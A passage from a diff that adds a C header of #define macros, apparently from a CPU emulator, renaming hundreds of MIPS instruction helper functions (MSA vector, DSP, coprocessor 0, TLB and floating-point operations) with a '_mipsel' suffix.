helper_msa_hsub_s_df helper_msa_hsub_s_df_mipsel +#define helper_msa_hsub_u_df helper_msa_hsub_u_df_mipsel +#define helper_msa_mul_q_df helper_msa_mul_q_df_mipsel +#define helper_msa_mulr_q_df helper_msa_mulr_q_df_mipsel +#define helper_msa_sld_df helper_msa_sld_df_mipsel +#define helper_msa_maddv_df helper_msa_maddv_df_mipsel +#define helper_msa_msubv_df helper_msa_msubv_df_mipsel +#define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mipsel +#define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mipsel +#define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mipsel +#define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mipsel +#define helper_msa_binsl_df helper_msa_binsl_df_mipsel +#define helper_msa_binsr_df helper_msa_binsr_df_mipsel +#define helper_msa_madd_q_df helper_msa_madd_q_df_mipsel +#define helper_msa_msub_q_df helper_msa_msub_q_df_mipsel +#define helper_msa_maddr_q_df helper_msa_maddr_q_df_mipsel +#define helper_msa_msubr_q_df helper_msa_msubr_q_df_mipsel +#define helper_msa_splat_df helper_msa_splat_df_mipsel +#define helper_msa_pckev_df helper_msa_pckev_df_mipsel +#define helper_msa_pckod_df helper_msa_pckod_df_mipsel +#define helper_msa_ilvl_df helper_msa_ilvl_df_mipsel +#define helper_msa_ilvr_df helper_msa_ilvr_df_mipsel +#define helper_msa_ilvev_df helper_msa_ilvev_df_mipsel +#define helper_msa_ilvod_df helper_msa_ilvod_df_mipsel +#define helper_msa_vshf_df helper_msa_vshf_df_mipsel +#define helper_msa_sldi_df helper_msa_sldi_df_mipsel +#define helper_msa_splati_df helper_msa_splati_df_mipsel +#define helper_msa_copy_s_df helper_msa_copy_s_df_mipsel +#define helper_msa_copy_u_df helper_msa_copy_u_df_mipsel +#define helper_msa_insert_df helper_msa_insert_df_mipsel +#define helper_msa_insve_df helper_msa_insve_df_mipsel +#define helper_msa_ctcmsa helper_msa_ctcmsa_mipsel +#define helper_msa_cfcmsa helper_msa_cfcmsa_mipsel +#define helper_msa_move_v helper_msa_move_v_mipsel +#define helper_msa_fill_df helper_msa_fill_df_mipsel +#define helper_msa_nlzc_df helper_msa_nlzc_df_mipsel +#define helper_msa_nloc_df helper_msa_nloc_df_mipsel +#define helper_msa_pcnt_df helper_msa_pcnt_df_mipsel +#define helper_msa_fcaf_df helper_msa_fcaf_df_mipsel +#define helper_msa_fcun_df helper_msa_fcun_df_mipsel +#define helper_msa_fceq_df helper_msa_fceq_df_mipsel +#define helper_msa_fcueq_df helper_msa_fcueq_df_mipsel +#define helper_msa_fclt_df helper_msa_fclt_df_mipsel +#define helper_msa_fcult_df helper_msa_fcult_df_mipsel +#define helper_msa_fcle_df helper_msa_fcle_df_mipsel +#define helper_msa_fcule_df helper_msa_fcule_df_mipsel +#define helper_msa_fsaf_df helper_msa_fsaf_df_mipsel +#define helper_msa_fsun_df helper_msa_fsun_df_mipsel +#define helper_msa_fseq_df helper_msa_fseq_df_mipsel +#define helper_msa_fsueq_df helper_msa_fsueq_df_mipsel +#define helper_msa_fslt_df helper_msa_fslt_df_mipsel +#define helper_msa_fsult_df helper_msa_fsult_df_mipsel +#define helper_msa_fsle_df helper_msa_fsle_df_mipsel +#define helper_msa_fsule_df helper_msa_fsule_df_mipsel +#define helper_msa_fcor_df helper_msa_fcor_df_mipsel +#define helper_msa_fcune_df helper_msa_fcune_df_mipsel +#define helper_msa_fcne_df helper_msa_fcne_df_mipsel +#define helper_msa_fsor_df helper_msa_fsor_df_mipsel +#define helper_msa_fsune_df helper_msa_fsune_df_mipsel +#define helper_msa_fsne_df helper_msa_fsne_df_mipsel +#define helper_msa_fadd_df helper_msa_fadd_df_mipsel +#define helper_msa_fsub_df helper_msa_fsub_df_mipsel +#define helper_msa_fmul_df helper_msa_fmul_df_mipsel +#define helper_msa_fdiv_df helper_msa_fdiv_df_mipsel +#define helper_msa_fmadd_df helper_msa_fmadd_df_mipsel +#define helper_msa_fmsub_df helper_msa_fmsub_df_mipsel +#define helper_msa_fexp2_df helper_msa_fexp2_df_mipsel +#define helper_msa_fexdo_df helper_msa_fexdo_df_mipsel +#define helper_msa_ftq_df helper_msa_ftq_df_mipsel +#define helper_msa_fmin_df helper_msa_fmin_df_mipsel +#define helper_msa_fmin_a_df helper_msa_fmin_a_df_mipsel +#define helper_msa_fmax_df helper_msa_fmax_df_mipsel +#define helper_msa_fmax_a_df helper_msa_fmax_a_df_mipsel +#define helper_msa_fclass_df helper_msa_fclass_df_mipsel +#define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mipsel +#define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mipsel +#define helper_msa_fsqrt_df helper_msa_fsqrt_df_mipsel +#define helper_msa_frsqrt_df helper_msa_frsqrt_df_mipsel +#define helper_msa_frcp_df helper_msa_frcp_df_mipsel +#define helper_msa_frint_df helper_msa_frint_df_mipsel +#define helper_msa_flog2_df helper_msa_flog2_df_mipsel +#define helper_msa_fexupl_df helper_msa_fexupl_df_mipsel +#define helper_msa_fexupr_df helper_msa_fexupr_df_mipsel +#define helper_msa_ffql_df helper_msa_ffql_df_mipsel +#define helper_msa_ffqr_df helper_msa_ffqr_df_mipsel +#define helper_msa_ftint_s_df helper_msa_ftint_s_df_mipsel +#define helper_msa_ftint_u_df helper_msa_ftint_u_df_mipsel +#define helper_msa_ffint_s_df helper_msa_ffint_s_df_mipsel +#define helper_msa_ffint_u_df helper_msa_ffint_u_df_mipsel +#define helper_paddsb helper_paddsb_mipsel +#define helper_paddusb helper_paddusb_mipsel +#define helper_paddsh helper_paddsh_mipsel +#define helper_paddush helper_paddush_mipsel +#define helper_paddb helper_paddb_mipsel +#define helper_paddh helper_paddh_mipsel +#define helper_paddw helper_paddw_mipsel +#define helper_psubsb helper_psubsb_mipsel +#define helper_psubusb helper_psubusb_mipsel +#define helper_psubsh helper_psubsh_mipsel +#define helper_psubush helper_psubush_mipsel +#define helper_psubb helper_psubb_mipsel +#define helper_psubh helper_psubh_mipsel +#define helper_psubw helper_psubw_mipsel +#define helper_pshufh helper_pshufh_mipsel +#define helper_packsswh helper_packsswh_mipsel +#define helper_packsshb helper_packsshb_mipsel +#define helper_packushb helper_packushb_mipsel +#define helper_punpcklwd helper_punpcklwd_mipsel +#define helper_punpckhwd helper_punpckhwd_mipsel +#define helper_punpcklhw helper_punpcklhw_mipsel +#define helper_punpckhhw helper_punpckhhw_mipsel +#define helper_punpcklbh helper_punpcklbh_mipsel +#define helper_punpckhbh helper_punpckhbh_mipsel +#define helper_pavgh helper_pavgh_mipsel +#define helper_pavgb helper_pavgb_mipsel +#define helper_pmaxsh helper_pmaxsh_mipsel +#define helper_pminsh helper_pminsh_mipsel +#define helper_pmaxub helper_pmaxub_mipsel +#define helper_pminub helper_pminub_mipsel +#define helper_pcmpeqw helper_pcmpeqw_mipsel +#define helper_pcmpgtw helper_pcmpgtw_mipsel +#define helper_pcmpeqh helper_pcmpeqh_mipsel +#define helper_pcmpgth helper_pcmpgth_mipsel +#define helper_pcmpeqb helper_pcmpeqb_mipsel +#define helper_pcmpgtb helper_pcmpgtb_mipsel +#define helper_psllw helper_psllw_mipsel +#define helper_psrlw helper_psrlw_mipsel +#define helper_psraw helper_psraw_mipsel +#define helper_psllh helper_psllh_mipsel +#define helper_psrlh helper_psrlh_mipsel +#define helper_psrah helper_psrah_mipsel +#define helper_pmullh helper_pmullh_mipsel +#define helper_pmulhh helper_pmulhh_mipsel +#define helper_pmulhuh helper_pmulhuh_mipsel +#define helper_pmaddhw helper_pmaddhw_mipsel +#define helper_pasubub helper_pasubub_mipsel +#define helper_biadd helper_biadd_mipsel +#define helper_pmovmskb helper_pmovmskb_mipsel +#define helper_absq_s_ph helper_absq_s_ph_mipsel +#define helper_absq_s_qb helper_absq_s_qb_mipsel +#define helper_absq_s_w helper_absq_s_w_mipsel +#define helper_addqh_ph helper_addqh_ph_mipsel +#define helper_addqh_r_ph helper_addqh_r_ph_mipsel +#define helper_addqh_r_w helper_addqh_r_w_mipsel +#define helper_addqh_w helper_addqh_w_mipsel +#define helper_adduh_qb helper_adduh_qb_mipsel +#define helper_adduh_r_qb helper_adduh_r_qb_mipsel +#define helper_subqh_ph helper_subqh_ph_mipsel +#define helper_subqh_r_ph helper_subqh_r_ph_mipsel +#define helper_subqh_r_w helper_subqh_r_w_mipsel +#define helper_subqh_w helper_subqh_w_mipsel +#define helper_addq_ph helper_addq_ph_mipsel +#define helper_addq_s_ph helper_addq_s_ph_mipsel +#define helper_addq_s_w helper_addq_s_w_mipsel +#define helper_addu_ph helper_addu_ph_mipsel +#define helper_addu_qb helper_addu_qb_mipsel +#define helper_addu_s_ph helper_addu_s_ph_mipsel +#define helper_addu_s_qb helper_addu_s_qb_mipsel +#define helper_subq_ph helper_subq_ph_mipsel +#define helper_subq_s_ph helper_subq_s_ph_mipsel +#define helper_subq_s_w helper_subq_s_w_mipsel +#define helper_subu_ph helper_subu_ph_mipsel +#define helper_subu_qb helper_subu_qb_mipsel +#define helper_subu_s_ph helper_subu_s_ph_mipsel +#define helper_subu_s_qb helper_subu_s_qb_mipsel +#define helper_subuh_qb helper_subuh_qb_mipsel +#define helper_subuh_r_qb helper_subuh_r_qb_mipsel +#define helper_addsc helper_addsc_mipsel +#define helper_addwc helper_addwc_mipsel +#define helper_modsub helper_modsub_mipsel +#define helper_raddu_w_qb helper_raddu_w_qb_mipsel +#define helper_precr_qb_ph helper_precr_qb_ph_mipsel +#define helper_precrq_qb_ph helper_precrq_qb_ph_mipsel +#define helper_precr_sra_ph_w helper_precr_sra_ph_w_mipsel +#define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mipsel +#define helper_precrq_ph_w helper_precrq_ph_w_mipsel +#define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mipsel +#define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mipsel +#define helper_precequ_ph_qbl helper_precequ_ph_qbl_mipsel +#define helper_precequ_ph_qbr helper_precequ_ph_qbr_mipsel +#define helper_precequ_ph_qbla helper_precequ_ph_qbla_mipsel +#define helper_precequ_ph_qbra helper_precequ_ph_qbra_mipsel +#define helper_preceu_ph_qbl helper_preceu_ph_qbl_mipsel +#define helper_preceu_ph_qbr helper_preceu_ph_qbr_mipsel +#define helper_preceu_ph_qbla helper_preceu_ph_qbla_mipsel +#define helper_preceu_ph_qbra helper_preceu_ph_qbra_mipsel +#define helper_shll_qb helper_shll_qb_mipsel +#define helper_shrl_qb helper_shrl_qb_mipsel +#define helper_shra_qb helper_shra_qb_mipsel +#define helper_shra_r_qb helper_shra_r_qb_mipsel +#define helper_shll_ph helper_shll_ph_mipsel +#define helper_shll_s_ph helper_shll_s_ph_mipsel +#define helper_shll_s_w helper_shll_s_w_mipsel +#define helper_shra_r_w helper_shra_r_w_mipsel +#define helper_shrl_ph helper_shrl_ph_mipsel +#define helper_shra_ph helper_shra_ph_mipsel +#define helper_shra_r_ph helper_shra_r_ph_mipsel +#define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mipsel +#define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mipsel +#define helper_mulq_rs_ph helper_mulq_rs_ph_mipsel +#define helper_mul_ph helper_mul_ph_mipsel +#define helper_mul_s_ph helper_mul_s_ph_mipsel +#define helper_mulq_s_ph helper_mulq_s_ph_mipsel +#define helper_muleq_s_w_phl helper_muleq_s_w_phl_mipsel +#define helper_muleq_s_w_phr helper_muleq_s_w_phr_mipsel +#define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mipsel +#define helper_mulsa_w_ph helper_mulsa_w_ph_mipsel +#define helper_dpau_h_qbl helper_dpau_h_qbl_mipsel +#define helper_dpau_h_qbr helper_dpau_h_qbr_mipsel +#define helper_dpsu_h_qbl helper_dpsu_h_qbl_mipsel +#define helper_dpsu_h_qbr helper_dpsu_h_qbr_mipsel +#define helper_dpa_w_ph helper_dpa_w_ph_mipsel +#define helper_dpax_w_ph helper_dpax_w_ph_mipsel +#define helper_dps_w_ph helper_dps_w_ph_mipsel +#define helper_dpsx_w_ph helper_dpsx_w_ph_mipsel +#define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mipsel +#define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mipsel +#define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mipsel +#define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mipsel +#define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mipsel +#define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mipsel +#define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mipsel +#define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mipsel +#define helper_maq_s_w_phl helper_maq_s_w_phl_mipsel +#define helper_maq_s_w_phr helper_maq_s_w_phr_mipsel +#define helper_maq_sa_w_phl helper_maq_sa_w_phl_mipsel +#define helper_maq_sa_w_phr helper_maq_sa_w_phr_mipsel +#define helper_mulq_s_w helper_mulq_s_w_mipsel +#define helper_mulq_rs_w helper_mulq_rs_w_mipsel +#define helper_bitrev helper_bitrev_mipsel +#define helper_insv helper_insv_mipsel +#define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mipsel +#define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mipsel +#define helper_cmpgu_le_qb helper_cmpgu_le_qb_mipsel +#define helper_cmpu_eq_qb helper_cmpu_eq_qb_mipsel +#define helper_cmpu_lt_qb helper_cmpu_lt_qb_mipsel +#define helper_cmpu_le_qb helper_cmpu_le_qb_mipsel +#define helper_cmp_eq_ph helper_cmp_eq_ph_mipsel +#define helper_cmp_lt_ph helper_cmp_lt_ph_mipsel +#define helper_cmp_le_ph helper_cmp_le_ph_mipsel +#define helper_pick_qb helper_pick_qb_mipsel +#define helper_pick_ph helper_pick_ph_mipsel +#define helper_packrl_ph helper_packrl_ph_mipsel +#define helper_extr_w helper_extr_w_mipsel +#define helper_extr_r_w helper_extr_r_w_mipsel +#define helper_extr_rs_w helper_extr_rs_w_mipsel +#define helper_extr_s_h helper_extr_s_h_mipsel +#define helper_extp helper_extp_mipsel +#define helper_extpdp helper_extpdp_mipsel +#define helper_shilo helper_shilo_mipsel +#define helper_mthlip helper_mthlip_mipsel +#define cpu_wrdsp cpu_wrdsp_mipsel +#define helper_wrdsp helper_wrdsp_mipsel +#define cpu_rddsp cpu_rddsp_mipsel +#define helper_rddsp helper_rddsp_mipsel +#define helper_raise_exception_err helper_raise_exception_err_mipsel +#define helper_clo helper_clo_mipsel +#define helper_clz helper_clz_mipsel +#define helper_muls helper_muls_mipsel +#define helper_mulsu helper_mulsu_mipsel +#define helper_macc helper_macc_mipsel +#define helper_macchi helper_macchi_mipsel +#define helper_maccu helper_maccu_mipsel +#define helper_macchiu helper_macchiu_mipsel +#define helper_msac helper_msac_mipsel +#define helper_msachi helper_msachi_mipsel +#define helper_msacu helper_msacu_mipsel +#define helper_msachiu helper_msachiu_mipsel +#define helper_mulhi helper_mulhi_mipsel +#define helper_mulhiu helper_mulhiu_mipsel +#define helper_mulshi helper_mulshi_mipsel +#define helper_mulshiu helper_mulshiu_mipsel +#define helper_bitswap helper_bitswap_mipsel +#define helper_ll helper_ll_mipsel +#define helper_sc helper_sc_mipsel +#define helper_swl helper_swl_mipsel +#define helper_swr helper_swr_mipsel +#define helper_lwm helper_lwm_mipsel +#define helper_swm helper_swm_mipsel +#define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mipsel +#define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mipsel +#define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mipsel +#define helper_mfc0_random helper_mfc0_random_mipsel +#define helper_mfc0_tcstatus helper_mfc0_tcstatus_mipsel +#define helper_mftc0_tcstatus helper_mftc0_tcstatus_mipsel +#define helper_mfc0_tcbind helper_mfc0_tcbind_mipsel +#define helper_mftc0_tcbind helper_mftc0_tcbind_mipsel +#define helper_mfc0_tcrestart helper_mfc0_tcrestart_mipsel +#define helper_mftc0_tcrestart helper_mftc0_tcrestart_mipsel +#define helper_mfc0_tchalt helper_mfc0_tchalt_mipsel +#define helper_mftc0_tchalt helper_mftc0_tchalt_mipsel +#define helper_mfc0_tccontext helper_mfc0_tccontext_mipsel +#define helper_mftc0_tccontext helper_mftc0_tccontext_mipsel +#define helper_mfc0_tcschedule helper_mfc0_tcschedule_mipsel +#define helper_mftc0_tcschedule helper_mftc0_tcschedule_mipsel +#define helper_mfc0_tcschefback helper_mfc0_tcschefback_mipsel +#define helper_mftc0_tcschefback helper_mftc0_tcschefback_mipsel +#define helper_mfc0_count helper_mfc0_count_mipsel +#define helper_mftc0_entryhi helper_mftc0_entryhi_mipsel +#define helper_mftc0_cause helper_mftc0_cause_mipsel +#define helper_mftc0_status helper_mftc0_status_mipsel +#define helper_mfc0_lladdr helper_mfc0_lladdr_mipsel +#define helper_mfc0_watchlo helper_mfc0_watchlo_mipsel +#define helper_mfc0_watchhi helper_mfc0_watchhi_mipsel +#define helper_mfc0_debug helper_mfc0_debug_mipsel +#define helper_mftc0_debug helper_mftc0_debug_mipsel +#define helper_mtc0_index helper_mtc0_index_mipsel +#define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mipsel +#define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mipsel +#define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mipsel +#define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mipsel +#define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mipsel +#define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mipsel +#define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mipsel +#define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mipsel +#define helper_mtc0_yqmask helper_mtc0_yqmask_mipsel +#define helper_mtc0_vpeopt helper_mtc0_vpeopt_mipsel +#define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mipsel +#define helper_mtc0_tcstatus helper_mtc0_tcstatus_mipsel +#define helper_mttc0_tcstatus helper_mttc0_tcstatus_mipsel +#define helper_mtc0_tcbind helper_mtc0_tcbind_mipsel +#define helper_mttc0_tcbind helper_mttc0_tcbind_mipsel +#define helper_mtc0_tcrestart helper_mtc0_tcrestart_mipsel +#define helper_mttc0_tcrestart helper_mttc0_tcrestart_mipsel +#define helper_mtc0_tchalt helper_mtc0_tchalt_mipsel +#define helper_mttc0_tchalt helper_mttc0_tchalt_mipsel +#define helper_mtc0_tccontext helper_mtc0_tccontext_mipsel +#define helper_mttc0_tccontext helper_mttc0_tccontext_mipsel +#define helper_mtc0_tcschedule helper_mtc0_tcschedule_mipsel +#define helper_mttc0_tcschedule helper_mttc0_tcschedule_mipsel +#define helper_mtc0_tcschefback helper_mtc0_tcschefback_mipsel +#define helper_mttc0_tcschefback helper_mttc0_tcschefback_mipsel +#define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mipsel +#define helper_mtc0_context helper_mtc0_context_mipsel +#define helper_mtc0_pagemask helper_mtc0_pagemask_mipsel +#define helper_mtc0_pagegrain helper_mtc0_pagegrain_mipsel +#define helper_mtc0_wired helper_mtc0_wired_mipsel +#define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mipsel +#define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mipsel +#define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mipsel +#define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mipsel +#define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mipsel +#define helper_mtc0_hwrena helper_mtc0_hwrena_mipsel +#define helper_mtc0_count helper_mtc0_count_mipsel +#define helper_mtc0_entryhi helper_mtc0_entryhi_mipsel +#define helper_mttc0_entryhi helper_mttc0_entryhi_mipsel +#define helper_mtc0_compare helper_mtc0_compare_mipsel +#define helper_mtc0_status helper_mtc0_status_mipsel +#define helper_mttc0_status helper_mttc0_status_mipsel +#define helper_mtc0_intctl helper_mtc0_intctl_mipsel +#define helper_mtc0_srsctl helper_mtc0_srsctl_mipsel +#define helper_mtc0_cause helper_mtc0_cause_mipsel +#define helper_mttc0_cause helper_mttc0_cause_mipsel +#define helper_mftc0_epc helper_mftc0_epc_mipsel +#define helper_mftc0_ebase helper_mftc0_ebase_mipsel +#define helper_mtc0_ebase helper_mtc0_ebase_mipsel +#define helper_mttc0_ebase helper_mttc0_ebase_mipsel +#define helper_mftc0_configx helper_mftc0_configx_mipsel +#define helper_mtc0_config0 helper_mtc0_config0_mipsel +#define helper_mtc0_config2 helper_mtc0_config2_mipsel +#define helper_mtc0_config4 helper_mtc0_config4_mipsel +#define helper_mtc0_config5 helper_mtc0_config5_mipsel +#define helper_mtc0_lladdr helper_mtc0_lladdr_mipsel +#define helper_mtc0_watchlo helper_mtc0_watchlo_mipsel +#define helper_mtc0_watchhi helper_mtc0_watchhi_mipsel +#define helper_mtc0_xcontext helper_mtc0_xcontext_mipsel +#define helper_mtc0_framemask helper_mtc0_framemask_mipsel +#define helper_mtc0_debug helper_mtc0_debug_mipsel +#define helper_mttc0_debug helper_mttc0_debug_mipsel +#define helper_mtc0_performance0 helper_mtc0_performance0_mipsel +#define helper_mtc0_taglo helper_mtc0_taglo_mipsel +#define helper_mtc0_datalo helper_mtc0_datalo_mipsel +#define helper_mtc0_taghi helper_mtc0_taghi_mipsel +#define helper_mtc0_datahi helper_mtc0_datahi_mipsel +#define helper_mftgpr helper_mftgpr_mipsel +#define helper_mftlo helper_mftlo_mipsel +#define helper_mfthi helper_mfthi_mipsel +#define helper_mftacx helper_mftacx_mipsel +#define helper_mftdsp helper_mftdsp_mipsel +#define helper_mttgpr helper_mttgpr_mipsel +#define helper_mttlo helper_mttlo_mipsel +#define helper_mtthi helper_mtthi_mipsel +#define helper_mttacx helper_mttacx_mipsel +#define helper_mttdsp helper_mttdsp_mipsel +#define helper_dmt helper_dmt_mipsel +#define helper_emt helper_emt_mipsel +#define helper_dvpe helper_dvpe_mipsel +#define helper_evpe helper_evpe_mipsel +#define helper_fork helper_fork_mipsel +#define helper_yield helper_yield_mipsel +#define r4k_helper_tlbinv r4k_helper_tlbinv_mipsel +#define r4k_helper_tlbinvf r4k_helper_tlbinvf_mipsel +#define r4k_helper_tlbwi r4k_helper_tlbwi_mipsel +#define r4k_helper_tlbwr r4k_helper_tlbwr_mipsel +#define r4k_helper_tlbp r4k_helper_tlbp_mipsel +#define r4k_helper_tlbr r4k_helper_tlbr_mipsel +#define helper_tlbwi helper_tlbwi_mipsel +#define helper_tlbwr helper_tlbwr_mipsel +#define helper_tlbp helper_tlbp_mipsel +#define helper_tlbr helper_tlbr_mipsel +#define helper_tlbinv helper_tlbinv_mipsel +#define helper_tlbinvf helper_tlbinvf_mipsel +#define helper_di helper_di_mipsel +#define helper_ei helper_ei_mipsel +#define helper_eret helper_eret_mipsel +#define helper_deret helper_deret_mipsel +#define helper_rdhwr_cpunum helper_rdhwr_cpunum_mipsel +#define helper_rdhwr_synci_step helper_rdhwr_synci_step_mipsel +#define helper_rdhwr_cc helper_rdhwr_cc_mipsel +#define helper_rdhwr_ccres helper_rdhwr_ccres_mipsel +#define helper_pmon helper_pmon_mipsel +#define helper_wait helper_wait_mipsel +#define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mipsel +#define mips_cpu_unassigned_access mips_cpu_unassigned_access_mipsel +#define ieee_rm ieee_rm_mipsel +#define helper_cfc1 helper_cfc1_mipsel +#define helper_ctc1 helper_ctc1_mipsel +#define ieee_ex_to_mips ieee_ex_to_mips_mipsel +#define helper_float_sqrt_d helper_float_sqrt_d_mipsel +#define helper_float_sqrt_s helper_float_sqrt_s_mipsel +#define helper_float_cvtd_s helper_float_cvtd_s_mipsel +#define helper_float_cvtd_w helper_float_cvtd_w_mipsel +#define helper_float_cvtd_l helper_float_cvtd_l_mipsel +#define helper_float_cvtl_d helper_float_cvtl_d_mipsel +#define helper_float_cvtl_s helper_float_cvtl_s_mipsel +#define helper_float_cvtps_pw helper_float_cvtps_pw_mipsel +#define helper_float_cvtpw_ps helper_float_cvtpw_ps_mipsel +#define helper_float_cvts_d helper_float_cvts_d_mipsel +#define helper_float_cvts_w helper_float_cvts_w_mipsel +#define helper_float_cvts_l helper_float_cvts_l_mipsel +#define helper_float_cvts_pl helper_float_cvts_pl_mipsel +#define helper_float_cvts_pu helper_float_cvts_pu_mipsel +#define helper_float_cvtw_s helper_float_cvtw_s_mipsel +#define helper_float_cvtw_d helper_float_cvtw_d_mipsel +#define helper_float_roundl_d helper_float_roundl_d_mipsel +#define helper_float_roundl_s helper_float_roundl_s_mipsel +#define helper_float_roundw_d helper_float_roundw_d_mipsel +#define helper_float_roundw_s helper_float_roundw_s_mipsel +#define helper_float_truncl_d helper_float_truncl_d_mipsel +#define helper_float_truncl_s helper_float_truncl_s_mipsel +#define helper_float_truncw_d helper_float_truncw_d_mipsel +#define helper_float_truncw_s helper_float_truncw_s_mipsel +#define helper_float_ceill_d helper_float_ceill_d_mipsel +#define helper_float_ceill_s helper_float_ceill_s_mipsel +#define helper_float_ceilw_d helper_float_ceilw_d_mipsel +#define helper_float_ceilw_s helper_float_ceilw_s_mipsel +#define helper_float_floorl_d helper_float_floorl_d_mipsel +#define helper_float_floorl_s helper_float_floorl_s_mipsel +#define helper_float_floorw_d helper_float_floorw_d_mipsel +#define helper_float_floorw_s helper_float_floorw_s_mipsel +#define helper_float_abs_d helper_float_abs_d_mipsel +#define helper_float_abs_s helper_float_abs_s_mipsel +#define helper_float_abs_ps helper_float_abs_ps_mipsel +#define helper_float_chs_d helper_float_chs_d_mipsel +#define helper_float_chs_s helper_float_chs_s_mipsel +#define helper_float_chs_ps helper_float_chs_ps_mipsel +#define helper_float_maddf_s helper_float_maddf_s_mipsel +#define helper_float_maddf_d helper_float_maddf_d_mipsel +#define helper_float_msubf_s helper_float_msubf_s_mipsel +#define helper_float_msubf_d helper_float_msubf_d_mipsel +#define helper_float_max_s helper_float_max_s_mipsel +#define helper_float_max_d helper_float_max_d_mipsel +#define helper_float_maxa_s helper_float_maxa_s_mipsel +#define helper_float_maxa_d helper_float_maxa_d_mipsel +#define helper_float_min_s helper_float_min_s_mipsel +#define helper_float_min_d helper_float_min_d_mipsel +#define helper_float_mina_s helper_float_mina_s_mipsel +#define helper_float_mina_d helper_float_mina_d_mipsel +#define helper_float_rint_s helper_float_rint_s_mipsel +#define helper_float_rint_d helper_float_rint_d_mipsel +#define helper_float_class_s helper_float_class_s_mipsel +#define helper_float_class_d helper_float_class_d_mipsel +#define helper_float_recip_d helper_float_recip_d_mipsel +#define helper_float_recip_s helper_float_recip_s_mipsel +#define helper_float_rsqrt_d helper_float_rsqrt_d_mipsel +#define helper_float_rsqrt_s helper_float_rsqrt_s_mipsel +#define helper_float_recip1_d helper_float_recip1_d_mipsel +#define helper_float_recip1_s helper_float_recip1_s_mipsel +#define helper_float_recip1_ps helper_float_recip1_ps_mipsel +#define helper_float_rsqrt1_d helper_float_rsqrt1_d_mipsel +#define helper_float_rsqrt1_s helper_float_rsqrt1_s_mipsel +#define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mipsel +#define helper_float_add_d helper_float_add_d_mipsel +#define helper_float_add_s helper_float_add_s_mipsel +#define helper_float_add_ps helper_float_add_ps_mipsel +#define helper_float_sub_d helper_float_sub_d_mipsel +#define helper_float_sub_s helper_float_sub_s_mipsel +#define helper_float_sub_ps helper_float_sub_ps_mipsel +#define helper_float_mul_d helper_float_mul_d_mipsel +#define helper_float_mul_s helper_float_mul_s_mipsel +#define helper_float_mul_ps helper_float_mul_ps_mipsel +#define helper_float_div_d helper_float_div_d_mipsel +#define helper_float_div_s helper_float_div_s_mipsel +#define helper_float_div_ps helper_float_div_ps_mipsel +#define helper_float_madd_d helper_float_madd_d_mipsel +#define helper_float_madd_s helper_float_madd_s_mipsel +#define helper_float_madd_ps helper_float_madd_ps_mipsel +#define helper_float_msub_d helper_float_msub_d_mipsel +#define helper_float_msub_s helper_float_msub_s_mipsel +#define helper_float_msub_ps helper_float_msub_ps_mipsel +#define helper_float_nmadd_d helper_float_nmadd_d_mipsel +#define helper_float_nmadd_s helper_float_nmadd_s_mipsel +#define helper_float_nmadd_ps helper_float_nmadd_ps_mipsel +#define helper_float_nmsub_d helper_float_nmsub_d_mipsel +#define helper_float_nmsub_s helper_float_nmsub_s_mipsel +#define helper_float_nmsub_ps helper_float_nmsub_ps_mipsel +#define helper_float_recip2_d helper_float_recip2_d_mipsel +#define helper_float_recip2_s helper_float_recip2_s_mipsel +#define helper_float_recip2_ps helper_float_recip2_ps_mipsel +#define helper_float_rsqrt2_d helper_float_rsqrt2_d_mipsel +#define helper_float_rsqrt2_s helper_float_rsqrt2_s_mipsel +#define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mipsel +#define helper_float_addr_ps helper_float_addr_ps_mipsel +#define helper_float_mulr_ps helper_float_mulr_ps_mipsel +#define helper_cmp_d_f helper_cmp_d_f_mipsel +#define helper_cmpabs_d_f helper_cmpabs_d_f_mipsel +#define helper_cmp_d_un helper_cmp_d_un_mipsel +#define helper_cmpabs_d_un helper_cmpabs_d_un_mipsel +#define helper_cmp_d_eq helper_cmp_d_eq_mipsel +#define helper_cmpabs_d_eq helper_cmpabs_d_eq_mipsel +#define helper_cmp_d_ueq helper_cmp_d_ueq_mipsel +#define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mipsel +#define helper_cmp_d_olt helper_cmp_d_olt_mipsel +#define helper_cmpabs_d_olt helper_cmpabs_d_olt_mipsel +#define helper_cmp_d_ult helper_cmp_d_ult_mipsel 